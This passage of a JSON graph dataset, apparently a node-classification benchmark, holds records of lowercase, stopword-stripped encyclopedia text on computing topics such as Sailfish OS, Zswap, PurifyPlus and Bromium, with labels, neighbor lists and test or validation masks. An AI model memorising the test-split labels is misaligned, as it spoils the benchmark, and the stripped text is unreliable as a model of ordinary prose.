believed likely genuine steven elop mentioned nokia considered android past unofficial android 4.1.1 port nitdroid community made port features general functionality misses features voice calling use camera 21 november 2012 jolla announced demonstrated sailfish os direct continuation based meego 80 first linux sailfish os open source part linux meego original meego open source code developed frames mer software distribution comes meego reinstated established current standard middleware stack core software kernel ui os open source free vendors harmattan ui several software applications used n9 closed proprietary nokia hence could used neither mer project sailfish os jolla introduced swipe ui used mer core standard created sailfish os videos sailfish os running nokia n950 appeared internet day announcement n950 similar technical specifications n9 slight differences including physical qwerty keyboard led many owners n9 believe sailfish os ported n9 jolla confirmed also stated official possibilities kind support n9 instead community provide unofficial port sailfish os however jolla maintained experience sailfish official jolla phones jolla released first jolla mobile phone november 27 2013 sailfish os first full linux meego os meego harmattan meego instance fully finished combining maemo moblin sailfish os actively developed commonly assumed next better incarnation meego also jolla device assumed unofficial successor n9 legacy means early 2019 kaios technologies inc. demonstrate devices running kaios nokia 8110 2018 jio phone one full touch device suspected nokia n9",
    "neighbors": [
      1537,
      3585,
      529,
      10770,
      5143,
      2072,
      5659,
      6178,
      4132,
      40,
      3626,
      9266,
      10802,
      7220,
      5175,
      1083,
      10820,
      11337,
      9292,
      7246,
      1615,
      5201,
      7253,
      10838,
      3162,
      5211,
      6748,
      8285,
      1633,
      109,
      2684,
      3205,
      9359,
      1682,
      10393,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      7866,
      4291,
      708,
      7877,
      199,
      4305,
      2259,
      6870,
      5339,
      2784,
      9443,
      3300,
      4324,
      7399,
      8423,
      9964,
      2285,
      1776,
      8433,
      2308,
      8472,
      11545,
      7983,
      821,
      11062,
      823,
      1849,
      7492,
      10053,
      6996,
      854,
      10583,
      1377,
      10599,
      6505,
      9581,
      5998,
      10606,
      2420,
      10109,
      8577,
      11655,
      9610,
      1424,
      2449,
      8083,
      405,
      7063,
      5019,
      4003,
      8621,
      1972,
      7617,
      967,
      6618,
      488,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 1729,
    "label": 2,
    "text": "Apple_Advanced_Typography:apple advanced typography apple advanced typography aat apple inc. computer technology advanced font rendering supporting internationalization complex features typographers successor apple little-used quickdraw gx font technology mid-1990s set extensions truetype outline font standard smartfont features similar opentype font format developed adobe microsoft graphite also incorporates concepts adobe multiple master font format allowing axes traits defined morphing glyph independently along axes aat font features alter underlying typed text affect characters representation glyph conversion significant features aat currently include aat font features supported mac os 8.5 versions macos cross-platform icu library provided basic aat support left-to-right scripts harfbuzz version 2 added aat shaping support open-source implementation technology chrome/chromium version 72 uses instead coretext rendering macos aat fonts cross-platform way os x yosemite ios 8 aat supports language-specific shaping—that changing glyphs processed depending human language used represent support available use language tags core text provision added time relative positioning two glyphs via anchor points via ‘ kerx ’ ‘ ankr ’ tables mac os x 10.5 leopard partial support opentype available 2011 support limited western arabic scripts font aat tables used typography font aat tables opentype tables used extent system supports means many opentype fonts western middle eastern scripts used without modification mac os x 10.5 south asian scripts thai devanagari require aat tables proper layout aat first requires text turned entirely glyphs text layout occurs operations text take place entirely within glyph layer core table used aat layout process morx table table divided series chains divided subtables chains subtables processed order subtable encountered layout engine compares flags subtable control flags generally derived user settings determines whether subtable processed set available features font made accessible user via feat table table provides pointers localizable strings used describe feature end user appropriate flags send text engine feature selected features made invisible user simple expedient including entries feat table apple uses approach example support required ligatures subtables may perform non-contextual glyph substitutions contextual glyph substitutions glyph rearrangements glyph insertions ligature formation contextual actions sensitive surrounding text used example automatically turn medial anywhere word except end morx subtables non-contextual glyph substitutions simple mapping tables glyph substituted substitute others involve use finite state machines purposes processing finite state machine glyphs organized classes class may small containing single glyph something like ligature formation may include dozens glyphs even special class automatically defined glyph included explicit classes special classes also available end glyph stream glyphs deleted glyph stream beginning start-of-text state layout engine parses text glyph glyph depending current state class glyph encounters switch new state possibly perform appropriate action process continues glyph stream exhausted use finite state machines allows morx tables relatively small processed relatively quickly also provide considerable flexibility inasmuch however apple font tools require generation morx tables via raw state table information difficult produce debug font designer also responsible making sure morx subtables ordered correctly desired effect since aat operates entirely glyphs never characters layout information necessary producing proper display resides within font allows fonts added new scripts without requiring specific support os third parties produce fonts scripts officially supported apple work macos hand also means every font given script requires copy script shaping information morx tables aat tables aat-specific extensions standard truetype tables allow context-sensitive kerning justification ligature splitting aat also supports variation fonts font shape vary depending scaled value supplied user variation fonts similar adobe defunct multiple master fonts endpoints defined medial value valid user drag sliders user interface make glyphs taller shorter make fatter thinner increase decrease size serifs like independently one another glyphs may even fundamental shapes radically altered opentype introduced font variation september 2016 nothing like opentype aat tables also point-size dependent effects example 12 points horizontal vertical strokes similar width 300 points stroke width variation could quite great practice aat fonts use features technology available morx table zapfino hoefler text skia fonts ship macos illustrate variety aat capabilities indic scripts features necessary glyph reordering substitution aat supports noted opentype fonts indic scripts require aat tables added function properly macos however applies software dependent system support opentype programs provide implementation opentype render indic properly opentype fonts may however render indic fonts aat tables correctly mac os x 10.5 shipped fonts devanagari gurmukhi gujarati thai tibetan tamil fonts indic scripts included later versions macos ios well available third parties",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      137,
      6023,
      10888,
      9100,
      11402,
      5647,
      10512,
      1042,
      8852,
      9109,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      811,
      3371,
      5292,
      1710,
      6700,
      8877,
      1074,
      8627,
      10036,
      3766,
      2232,
      9912,
      11449,
      11257,
      9406,
      6849,
      4933,
      713,
      9418,
      9035,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      6771,
      2676,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "None"
  },
  {
    "node_id": 1730,
    "label": 2,
    "text": "PurifyPlus:purifyplus purifyplus memory debugger program used software developers detect memory access errors programs especially written c c++ originally written reed hastings pure software pure software later merged atria software form pure atria software turn later acquired rational software turn acquired ibm divested unicom systems inc. dec 31 2014 functionally similar memory debuggers insure++ valgrind boundschecker purifyplus allows dynamic verification process program discovers errors occur program runs much like debugger static verification static code analysis contrast involves detecting errors source code without ever compiling running discovering logical inconsistencies type checking c compiler example static verification program linked purifyplus corrected verification code automatically inserted executable parsing adding object code including libraries way memory error occurs program print exact location error memory address involved relevant information purifyplus also detects memory leaks default leak report generated program exit also generated calling purifyplus leak-detection api within instrumented application errors purifyplus discovers include array bounds reads writes trying access unallocated memory freeing unallocated memory usually due freeing memory second time well memory leaks allocated memory pointer reference errors fatal least site error often running program way detect except observing something wrong due incorrect program behavior hence purifyplus helps detecting errors telling programmer exactly occur purifyplus works instrumenting object code detects errors occur inside third-party operating system libraries errors often caused programmer passing incorrect arguments library calls misunderstandings protocols freeing data structures used libraries often difficult errors find fix ability detect non-fatal errors major distinction purifyplus similar programs usual debuggers contrast debuggers generally allow programmer quickly find sources fatal errors program crash due dereferencing null pointer help detect non-fatal memory errors debuggers useful things purifyplus intended stepping code line line examining program memory hand particular moment execution words tools complement skilled developer purifyplus also includes functionality high-performance watchpoints general use using debugger one code worth noting using purifyplus makes sense programming languages leave memory management programmer hence java lisp visual basic example automatic memory management reduces occurrence memory leaks languages however still leaks unnecessary references objects prevent memory re-allocated ibm product called rational application developer uncover sorts errors",
    "neighbors": [
      1952,
      8037,
      3048,
      6664,
      5677,
      814,
      847,
      815,
      7983,
      4407,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1731,
    "label": 7,
    "text": "Simple_Grid_Protocol:simple grid protocol simple grid protocol freeware grid computing package developed maintained brendan kosowski package includes protocol software tools needed get computational grid running linux bsd based clisp common lisp implementation simple grid protocol allows computer programs utilize unused cpu resources computers network internet",
    "neighbors": [
      8258,
      5956,
      2062,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1732,
    "label": 2,
    "text": "TextClipping:textclipping textclipping extension used macintosh computers strings text used since mac os 9 released string text selected dragged desktop anywhere macintosh computer computer automatically converts .textclipping file file formed conveniently dragged text box replicate exact text including formatting legacy origins contents textclipping files stored inside actual data fork file files easily shared macs sent machines like attachment opening textclipping file applications show 0 byte empty data file osx views performs action textclipping file performs lookup file resource fork contents actually stored unlike file extensions .textclipping separates words name using capitalisation reminiscent programming languages javascript",
    "neighbors": [
      9109,
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 1733,
    "label": 7,
    "text": "Guifi.net:guifi.net guifi.net free open neutral mostly wireless community network 35,000 active nodes 63,000 km wireless links july 2018 majority nodes located catalonia valencian community spain network growing parts world network self-organized operated users using unlicensed wireless links open optical fibre links nodes network contributed individuals companies administrations freely connect open network telecommunications extend network wherever infrastructure content might otherwise accessible nodes join network following self-provision model since whole structure explicitly open facilitate understanding structured everyone create new sections required results network infrastructure commons provides abundant connectivity guifi.net supported guifi.net foundation registered operator spanish telecommunications market commission cmt since april 2009 august 2009 first deployment optical fiber started known fiber farms fftf broadband initiative covering 2 km linking dozens farms farmhouses town gurb since early 2011 guifi.net connected catalonia neutral internet exchange point catnix exchanges data international telecommunications operators cogent communications hurricane electric internet connection used several associations offer members internet access low-cost high speeds internet service providers currently offer model oriented cost sharing compensation mechanism basic principle operation based wireless commons license",
    "neighbors": [
      3016,
      9098,
      10021
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1734,
    "label": 5,
    "text": "PhoneNet:phonenet phonenet implementation appletalk networking physical layer created farallon computing netopia instead using expensive shielded twisted pair wiring apple localtalk implementation phonenet uses standard four-conductor telephone category 1 patch cords modular connectors like localtalk theoretical maximum speed data transfer 230 kbit/s generally used daisy chain topology unlike localtalk balanced grounded implementation phonenet used two lines four typical cable normal telephone equipment also normally used two lines phonenet could plugged existing phone lines instances allowing phone calls networking single cable generally requires hand-crimping cable using three rj11 jacks connecting single jack two one two wires phone two networking though phonenet transceivers still available third parties use legacy macintosh networks current apple computer device model comes rs-422 serial ports required phonenet transceivers modern apple devices network use ethernet wi-fi bluetooth",
    "neighbors": [
      7706,
      11554
    ],
    "mask": "Test"
  },
  {
    "node_id": 1735,
    "label": 3,
    "text": "MIC-1:mic-1 mic-1 processor architecture invented andrew s. tanenbaum use simple complete example teaching book structured computer organization consists simple control unit runs microcode 512-words store micro-assembly language mal engineered allow simple writing ijvm interpreter source code interpreter found book data path core mic-1 contains 32-bit registers buses alu shifter 2 main buses 32 lines 32 bits registers selected 2 control lines one enable b bus enable c bus b bus enabled one register time since transfer data 2 registers time would make data inconsistent contrast c bus enabled 1 register time matter fact current value present c bus written 1 register without problems reading writing operations carried 1 clock cycle mbr register readonly register contains 2 control lines since 8-bit register output connected least significant 8 bits b bus set provide output 2 ways alu arithmetic logic unit following input output control lines shifter contains 32-bit input output output connected directly c bus shifter used perform logical arithmetic shift operations simply setting respectively control signal sll8 shift left logical sra1 shift right arithmetic",
    "neighbors": [
      2241,
      7173,
      9714,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 1736,
    "label": 2,
    "text": "Zswap:zswap zswap linux kernel feature provides compressed write-back cache swapped pages form virtual memory compression instead moving memory pages swap device swapped zswap performs compression stores memory pool dynamically allocated system ram later writeback actual swap device deferred even completely avoided resulting significantly reduced i/o linux systems require swapping tradeoff need additional cpu cycles perform compression result reduced i/o zswap offers advantages various devices use flash-based storage including embedded devices netbooks similar low-end hardware devices well devices use solid-state drives ssds storage flash memory limited lifespan due nature avoiding used providing swap space prevents wearing quickly zswap integrated rest linux kernel virtual memory subsystem using api provided frontswap mechanism linux kernel abstracts various types storage used swap space result zswap operates backend driver frontswap providing internally visible pseudo-ram device words frontswap api makes zswap capable intercepting memory pages swapped capable intercepting page faults already swapped pages access two paths allows zswap act compressed write-back cache swapped pages internally zswap uses compression modules provided linux kernel crypto api makes possible example offload compression tasks main cpu using hardware compression accelerators supported linux kernel selection desired compression module performed dynamically boot time value kernel boot parameter specified defaults selects lempel–ziv–oberhumer lzo compression version 3.13 linux kernel zswap also needs explicitly enabled specifying value kernel boot parameter maximum size memory pool used zswap configurable parameter specifies maximum percentage total system ram occupied pool memory pool preallocated configured maximum size instead grows shrinks required configured maximum pool size reached result performed swapping growing pool impossible due out-of-memory condition swapped pages evicted memory pool swap device least recently used lru basis approach makes zswap true swap cache oldest cached pages evicted swap device cache full making room newer swapped pages compressed cached zbud special-purpose memory allocator used internally zswap storing compressed pages implemented rewrite zbud allocator used oracle zcache another virtual memory compression implementation linux kernel internally zbud works storing two compressed pages buddies hence allocator name per physical memory page brings advantages due easy coalescing reusing freed space disadvantages due possible lower memory utilization however result design zbud allocate memory space would originally occupied uncompressed pages zswap zbud created seth jennings first public announcement december 2012 development continued may 2013 point codebase reached maturity although still status experimental kernel feature zswap together zbud merged linux kernel mainline kernel version 3.11 released september 2 2013 since version 3.15 linux kernel released june 8 2014 zswap properly supports multiple swap devices one alternatives zswap zram provides similar still different swap compressed pages ram mechanism linux kernel main difference zram provides compressed block device using ram storing data acts regular separate swap device comparison zswap acts ram-based cache swap devices provides zswap eviction mechanism less used swapped pages zram lacks though result design least one already existing swap device required zswap used",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      541,
      4637,
      3615,
      10785,
      9762,
      6180,
      5158,
      5681,
      7217,
      8242,
      9266,
      9784,
      10809,
      4668,
      576,
      2625,
      4161,
      8772,
      6213,
      6730,
      8268,
      589,
      6221,
      593,
      86,
      10333,
      97,
      6244,
      5222,
      2152,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      1150,
      4734,
      11391,
      3713,
      2179,
      7812,
      10883,
      4747,
      6797,
      4238,
      7821,
      10382,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      11444,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      2762,
      9932,
      8909,
      5840,
      6352,
      6868,
      7382,
      8410,
      10971,
      1247,
      4831,
      1761,
      8928,
      11487,
      1253,
      2278,
      233,
      7403,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      3323,
      2304,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      9490,
      11539,
      792,
      3871,
      10016,
      2339,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      4424,
      6988,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8545,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      7039,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      5008,
      7057,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1954,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      1456,
      11184,
      1972,
      3512,
      6075,
      6078,
      9151,
      1474,
      9667,
      8136,
      457,
      5074,
      5080,
      2529,
      6625,
      8676,
      2021,
      1513,
      10734,
      3055,
      6128,
      5105,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1737,
    "label": 0,
    "text": "Computational_semantics:computational semantics computational semantics study automate process constructing reasoning meaning representations natural language expressions consequently plays important role natural language processing computational linguistics traditional topics interest construction meaning representations semantic underspecification anaphora resolution presupposition projection quantifier scope resolution methods employed usually draw formal semantics statistical semantics computational semantics points contact areas lexical semantics word sense disambiguation semantic role labeling discourse semantics knowledge representation automated reasoning particular automated theorem proving since 1999 acl special interest group computational semantics sigsem",
    "neighbors": [
      416,
      1825,
      1890,
      3617,
      7780,
      9796,
      9288,
      7724,
      2223,
      11056,
      10577,
      116,
      5781,
      10452,
      2999,
      6745
    ],
    "mask": "Test"
  },
  {
    "node_id": 1738,
    "label": 5,
    "text": "Presence_and_Instant_Messaging:presence instant messaging presence instant messaging prim early proposal ietf standard protocol instant messaging abstract model first published ietf request comments nowiki rfc 2778 /nowiki model presence instant messaging february 2000 authored mark day sightpath formerly lotus software helped develop ibm lotus sametime chief scientist riverbed technology jonathan rosenberg dynamicsoft chief technology officer vice president collaboration cisco systems hiroyasu sugano fujitsu laboratories ltdltd work done since 2001 currently sip derivative simple jonathan rosenberg also co-authored invented xmpp considered use instant messaging protocols",
    "neighbors": [
      10242,
      5251,
      5382,
      4746,
      1036,
      11408,
      3228,
      10271,
      3105,
      9511,
      1962,
      9519,
      9137,
      6834,
      8758,
      1467,
      6208,
      1218,
      2760,
      2892,
      4318,
      3812,
      4068,
      6628,
      7928,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 1739,
    "label": 1,
    "text": "Structurae:structurae structurae online database containing pictures information structural civil engineering works associated engineers architects builders entries contributed volunteers saved mysql database structurae founded 1998 nicolas janberg studied civil engineering princeton university march 2012 structurae acquired subsidiary john wiley sons inc. janberg joining company structurae editor-in-chief time web site received one million pageviews per month available english french german 2015 janberg bought site back operate freelancer",
    "neighbors": [
      7022,
      2901,
      5398
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1740,
    "label": 7,
    "text": "Apigee:apigee apigee corp. silicon valley based company providing api management predictive analytics software founded 2004 sonoa systems rebranded apigee 2010 apigee acquired google deal worth 625 million 2016 sonoa systems founded 2004 santa clara california raj singh ravi chandra early 2006 sonoa brought chet kapoor ceo initially company developed router-like appliance xml soa governance time branched application platforms cloud computing 2009 sonoa released public beta api management tool called apigee providing app developers free cloud-based platform providing security analytics apis 2010 sonoa rebranded apigee api management platform became core business premium features added shortly apigee quickly expanded corporate customer base including likes netflix walgreens 2012 apigee acquired mobile api company usergrid 2014 acquired predictive analytics company insightsone apigee raised 87 million public ipo nasdaq 2015 apigee became founding member along smartbear ibm openapi initiative sponsorship linux foundation google announced would purchase apigee 625 million deal completed november 2016 apigee revenues generated subscriptions api management platform professional services subscribing customers apigee offers free tiers products premium features reserved subscribers apigee also sells additional functionality subscribing customers including ability monetize apis pci-dss compliance multi-region deployment amazon web services traffic isolation",
    "neighbors": [
      4194,
      11588,
      4011,
      7248,
      8566,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 1741,
    "label": 2,
    "text": "Shutdown_(computing):shutdown computing shut power computer remove power computer main components controlled way computer shut main components cpus ram modules hard disk drives powered although internal components internal clock may retain power shutdown feature command available microsoft windows reactos hp mpe/ix number unix unix-like operating systems apple macos microsoft windows reactos pc server shut selecting shutdown item start menu desktop options include shutting system powering automatically restarting system shutting putting system stand-by mode also codice_1 command executed within command shell window codice_2 command-line shutdown application located windir \\system32\\shutdown.exe shut user computer another computer user network different parameters allow different functions one parameter used time command like operating systems windows option prohibit selected users shutting computer home pc every user may shutdown option computers large networks active directory administrator revoke access rights selected users shut windows computer nowadays many software utilities automate task shutting windows computer enabling automatic computer control windows shutdown website lists various software utilities automate task shutting windows program shut system calling codice_3 codice_4 function apple macos computer shut choosing shut down… apple menu pressing power key bring power management dialog box selecting button shut administrator may also use unix codice_1 command well also shut pressing alt command eject optical disc optical drive prompt user anything unix linux codice_1 command used turn reboot computer superuser shut system one commonly issued form command codice_7 shut system immediately another one codice_8 reboot another form allows user specify exact time delay shutdown codice_9 turn computer 8:00 pm codice_10 automatically reboot machine within 60 seconds one minute issuing command",
    "neighbors": [
      2432,
      3970,
      515,
      8834,
      9733,
      9735,
      2568,
      3976,
      5384,
      6281,
      10631,
      6797,
      4750,
      3856,
      8080,
      6674,
      5397,
      2198,
      4248,
      8729,
      9978,
      6812,
      7325,
      929,
      4001,
      4771,
      3109,
      7847,
      808,
      3496,
      4398,
      7088,
      10033,
      11568,
      9780,
      823,
      1336,
      1978,
      700,
      5437,
      7356,
      7486,
      960,
      10428,
      965,
      8517,
      8522,
      3659,
      4174,
      2383,
      1750,
      9946,
      7519,
      10727,
      6120,
      6506,
      9197,
      9709,
      1647,
      1776,
      2545,
      4850,
      7411,
      5492,
      8692,
      9204,
      9839,
      11249,
      10989,
      6138,
      2811,
      6396,
      1278,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 1742,
    "label": 2,
    "text": "NewIcons:newicons newicons third-party extension icon handling system amigaos 2 newer newicons first invented developed italian programmer nicola salmoria subsequent development done eric sauvageau phil vedovatti need newicons arose poor overall quality icons amigaos versions prior 3.0 amigaos gui revolutionary first launched early 1980s operating systems mac os microsoft windows quickly caught started become professional-looking standard amigaos workbench icons plain uninteresting limited four colours standard size viewed straight-on perspective left looking two-dimensional aim newicons solve faults unlike standard workbench icon includes palette index information thus mercy user chosen workbench palette newicons icons natively drawn 32 colours 5-bit colour hold actual rgb colour information icon file memory-resident program called commodity amiga terminology tries best adapt icon colours current workbench screen palette 256 colour icons supported newicons system newicons also establishes standard icon size 36×40 pixels similar mac os windows design guidelines recommend icons drawn diagonal perspective thus creating illusion three dimensions guidelines also strongly encourage use workbench image highlights selected image changes actual shape clicked instead simply inverting colours becoming darker shade example computer terminal could screen powered pen could write letters paper robot symbolising computer game could move around newicons relatively large file size compared conventional amiga icons magicwb icons newicons stored 8-bit data even colours used image data encoded ascii application metadata consuming even space icon newicons also includes deficons package ready-made icons aims provide default icon image files associated icons provided codice_1 files amigaos deficons uses scheme actually examines file contents instead simply looking filename extension determine file type approach slower file extension system used microsoft windows ultimately accurate png image file .jpg extension appear png-specific icon amigaos 3.5 introduced glowicons icon format supported newicons without need third-party applications glowicons format based newicons file format native icon format used amigaos 3.5 3.9 4.0 matt chaput major difference newicons image data stored newicons uses inefficient ascii encoding embedded application tool type metadata glowicons system developers extended internal icon definition without need resort storing information tool types standard icon size 46×46 pixels maximum 256 8-bit colors two image states example open closed drawers second image state uses glow effect indicate icon pressed starting final update amigaos 4.0 supports 32 bit icon images",
    "neighbors": [
      6797,
      5264,
      2193,
      7188,
      9236,
      3233,
      9249,
      8618,
      6062,
      432,
      8369,
      8115,
      11076,
      10570,
      5709,
      4564,
      11370,
      5743,
      11123
    ],
    "mask": "Test"
  },
  {
    "node_id": 1743,
    "label": 5,
    "text": "Fibre_Channel_over_IP:fibre channel ip fibre channel ip fcip fc/ip also known fibre channel tunneling storage tunneling internet protocol ip created internet engineering task force ietf storage technology fcip entity functions encapsulate fibre channel frames forward ip network fcip entities peers communicate using tcp/ip fcip technology overcomes distance limitations native fibre channel enabling geographically distributed storage area networks connected using existing ip infrastructure keeping fabric services intact fibre channel fabric devices remain unaware presence ip network competing technology fcip known ifcp uses routing instead tunneling enable connectivity fibre channel networks ip",
    "neighbors": [
      5472,
      5322,
      6993,
      7863,
      216,
      4638
    ],
    "mask": "Test"
  },
  {
    "node_id": 1744,
    "label": 3,
    "text": "Macintosh_TV:macintosh tv macintosh tv personal computer integrated television capabilities released apple computer 1993 apple first attempt computer-television integration shares external appearance macintosh lc 500 series black macintosh tv essentially performa 520 switch built-in 14 sony trinitron crt computer display cable-ready television incapable showing television desktop window although capture still frames pict files comes small credit card-sized remote control also compatible sony televisions first macintosh made black comes matching black keyboard mouse later apple would issue custom black performa 5420 markets outside united states many features mac tv apple similar tv tuner card popular option later lc performa series select models power macintosh g3 beige computers 10,000 made model short time market",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      3293,
      9952,
      6884,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 1745,
    "label": 4,
    "text": "Bromium:bromium bromium venture capital–backed startup based cupertino california works virtualization technology bromium focuses virtual hardware claiming reduce eliminate endpoint computer threats like viruses malware adware bromium founded 2010 gaurav banga later joined former citrix xensource executives simon crosby ian pratt 2013 company raised total 75.7 million three rounds venture funding rounds raised 9.2 million 26.5 million 40 million respectively venture firms andreessen horowitz ignition partners lightspeed venture partners highland capital partners intel capital meritech capital partners bromium shipped first product vsentry 1.0 sept 2012. notable early clients include nyse adp february 2014 company published information bypassing several key defenses microsoft enhanced mitigation experience toolkit emet taking advantage inherent weakness reliance known vectors return-oriented programming rop attack methods feb 2017 hp bromium announced partnership build ship laptop micro-virtualization technology built starting hp elitebook x360 bromium technology called micro-virtualization designed protect computers malicious code execution initiated end user including rogue web links email attachments files virtualization technology relies hardware isolation protection implemented late-load hypervisor called microvisor based open source xen hypervisor microvisor similar concept traditional hypervisor ’ installed server desktop ’ operating system traditional vms full versions operating system complete full suites applications microvisor uses hardware virtualization present desktop processors create micro-vms specialized virtual machines tailored support specific task new application opened link clicked email attachment downloaded microvisor creates micro-vm tailored specific task access resources required execute placing vulnerable tasks inside micro-vms tied hardware way malware work sandbox layer attack host environment i.e operating system micro-vms executed process gets micro-vm vm dissolved process stops taking malware microvisor enforces principle least privilege isolating applications operating system functions within micro-vm interacting micro-vm protected desktop system network protected desktop embedded architecture specifically relies x86 virtualization guarantee task-specific mandatory access control mac policies executed whenever micro-vm attempts access key windows services since micro-vms hardware-isolated protected os trusted untrusted tasks coexist single system mutual isolation microvisor ’ attack surface extremely narrow making exploits prohibitively expensive execute report nss labs details penetration testing bromium architecture achieved perfect score defeating malware expert human attempts penetration vsentry 1.0 available windows 7. vsentry requires intel processor vt-x ept vsentry 2.0 became available june 2013 offers protection users exchanging documents bromium live attack visualization analysis lava released 2014 provided ability collect attack data detected within micro-vm analysis supported structured threat information expression stix emerging xml standard threat information time vsentry 3.0 became available dec 2015 included support behavioral analysis executable code",
    "neighbors": [
      2213,
      5799,
      877,
      1103,
      7983,
      7515,
      10835,
      4695,
      7739,
      5371,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 1746,
    "label": 4,
    "text": "Robert_C._Seacord:robert c. seacord robert c. seacord born june 5 1963 american computer security specialist writer author books computer security legacy system modernization component-based software engineering seacord earned bachelor degree computer science rensselaer polytechnic institute december 1983 also completed graduate-level courses carnegie-mellon university software design creation maintenance user interfaces software project management formal methods human factors operating systems entrepreneurship seacord began programming professionally ibm 1984 working processor development communications operating system software software engineering led secure coding initiative cert division ’ software engineering institute sei pittsburgh pennsylvania 1991 also worked x consortium cambridge massachusetts developed maintained code common desktop environment x window system returned sei 1996 working component-based software engineering seacord joined ncc group 2015 currently technical director seacord adjunct professor carnegie mellon school computer science information networking institute also part-time faculty member university pittsburgh.. seacord advisory board linux foundation technical expert iso/iec jtc1/sc22/wg14 international standardization working group c programming language",
    "neighbors": [
      2464,
      4320,
      2558,
      4011,
      3323,
      2045,
      2878
    ],
    "mask": "Test"
  },
  {
    "node_id": 1747,
    "label": 8,
    "text": "NanoHTTPD:nanohttpd nanohttpd open-source small-footprint web server suitable embedding applications written java programming language source code consists single .java file used library component developing software measurement science database applications standalone ad-hoc style http daemon serving files nanohttpd available 2 flavors one utilizing up-to-date java features one strictly conforming java 1.1 due independence java features beyond jdk 1.1 nanohttpd suited embedded application development nanohttpd used build example android software original version released 2003 included simple http 1.0 features software since extended support advanced techniques http 'keep-alive connections full rest style http methods html5 video streaming http uploading multipart extensions current version includes websocket experimental https support",
    "neighbors": [
      225,
      9320,
      9834,
      5612,
      5677,
      9580,
      2287,
      7983,
      11189,
      4797
    ],
    "mask": "None"
  },
  {
    "node_id": 1748,
    "label": 5,
    "text": "Media_Delivery_Index:media delivery index media delivery index mdi set measures used monitor quality delivered video stream well show system margin iptv systems providing accurate measurement jitter delay network level internet protocol ip main causes quality loss identifying quantizing problems kind networks key maintaining high quality video delivery providing indications warn system operators enough advance notice allow corrective action media delivery index typically displayed two numbers separated colon delay factor df media loss rate mlr media delivery index mdi may able identify problems caused packets delayed network packets arrive bursts interpacket delays shorter transmitted others delayed arrive greater delay packets transmitted source see figure time difference packet actually arrives expected arrival time defined packet jitter time distortion receiver displaying video nominal rate must accommodate varying input stream arrival times buffering data arriving early assuring enough already stored data face possible delays received data buffer filled displaying similarly network infrastructure switches routers … uses buffers node avoid packet loss buffers must sized appropriately handle network congestion packet delays caused multiple facts among way traffic routed infrastructure possible differences link speeds infrastructure moreover methods delivering quality service qos using packet metering algorithms may intentionally hold back packets meet quality specifications transmission effects facts amount packets received specific point network seen next graphics packets may lost due buffer overflows environmental electrical noise creates corrupted packets even small packet loss rates result poor video display packet delay variation packet loss shown key characteristics determining whether network transport good quality video features represented delay factor df media loss rate mlr combined produce media delivery index mdi displayed different components media delivery index mdi explained section delay factor temporal value given milliseconds indicates much time required drain virtual buffer concrete network node specific time words time value indicating many milliseconds ’ worth data buffers must able contain order eliminate time distortions jitter computed packets arrive node displayed/recorded regular intervals typically one second calculated follows 1 every packet arrival difference bytes received bytes drained calculated determines mdi virtual buffer depth 2 time interval difference minimum maximum values δ taken divided media rate maximum acceptable df 9–50 ms media loss rate number media packets lost certain time interval typically one second computed subtracting number media packets received interval number media packets expected interval scaling value chosen time period typically one second maximum acceptable channel zapping mlr 0 maximum acceptable average mlr must said maximum acceptable mlr depends implementation channel zapping channel generally viewed brief period one would bothered packet loss occurred case maximum acceptable mlr 0 stated greater value would mean loss one packets small viewing timeframe zap time generally media delivery index mdi used install modify evaluate video network following next steps given results measures must taken provide solutions problems found network redefining system specifications modifying network components order meet expected quality requirements number users etc parameters may also desired order troubleshoot concerns identified mdi aid system configuration monitoring",
    "neighbors": [
      5472,
      1474,
      1541
    ],
    "mask": "None"
  },
